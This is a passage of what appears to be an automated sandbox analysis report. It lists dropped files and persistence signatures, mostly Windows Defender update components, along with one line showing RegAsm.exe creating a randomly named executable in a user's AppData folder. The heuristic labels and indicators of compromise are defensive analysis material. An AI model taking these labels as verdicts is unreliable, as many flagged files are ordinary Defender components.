Source: MpClient.dll.41.dr Static PE information: section name: .didat
Source: MpCommu.dll.41.dr Static PE information: section name: .didat
Source: MpRtp.dll.41.dr Static PE information: section name: .didat
Source: MpSvc.dll.41.dr Static PE information: section name: .didat
Source: ProtectionManagement.dll.41.dr Static PE information: section name: .didat
Source: MpClient.dll0.41.dr Static PE information: section name: .didat

Persistence and Installation Behavior:

Sample is not signed and drops a device driver
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\Drivers\WdBoot.sys
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\Drivers\WdDevFlt.sys
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\Drivers\WdFilter.sys
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\Drivers\WdNisDrv.sys
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\mpasdlta.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\mpavdlta.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\mpasbase.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\mpavbase.vdm Jump to dropped file
Drops PE files
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpAzSubmit.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\bg-BG\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\pt-PT\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\sv-SE\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\es-MX\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\kn-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\en-US\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\nl-NL\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ur-PK\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\it-IT\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\uk-UA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ml-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\pa-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ru-RU\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ko-KR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\x86\MpOAV.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\cs-CZ\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\pl-PL\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\x86\en-US\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ro-RO\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\tr-TR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpRtp.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpUxAgent.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MsMpEng.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ar-SA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\as-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\es-ES\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\vi-VN\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\el-GR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\quz-PE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\Drivers\WdBoot.sys Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\gd-GB\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\it-IT\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\nl-NL\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\sl-SI\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ta-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ko-KR\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\lo-LA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MsMpLics.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\fi-FI\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\nb-NO\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\zh-TW\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\sr-Latn-RS\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpCmdRun.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\en-US\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\bs-Latn-BA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpEvMsg.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\hi-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\sv-SE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpUpdate.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\af-ZA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ne-NP\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\fi-FI\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\lv-LV\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\cy-GB\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\bn-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ar-SA\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\et-EE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\fr-FR\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\endpointdlp.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ja-JP\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\tt-RU\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\tr-TR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSvc.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\x86\MpCmdRun.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\hu-HU\mpuxagent.dll.mui Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\x86\MpOAV.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\cs-CZ\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\pl-PL\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\x86\en-US\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ro-RO\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\tr-TR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpRtp.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpUxAgent.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MsMpEng.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ar-SA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\as-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\es-ES\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\vi-VN\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\el-GR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\quz-PE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\Drivers\WdBoot.sys Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\gd-GB\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\it-IT\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\nl-NL\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\sl-SI\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ta-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ko-KR\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\lo-LA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MsMpLics.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\fi-FI\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\nb-NO\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\zh-TW\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\sr-Latn-RS\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpCmdRun.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\en-US\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\bs-Latn-BA\mpuxagent.dll.mui Jump to dropped file
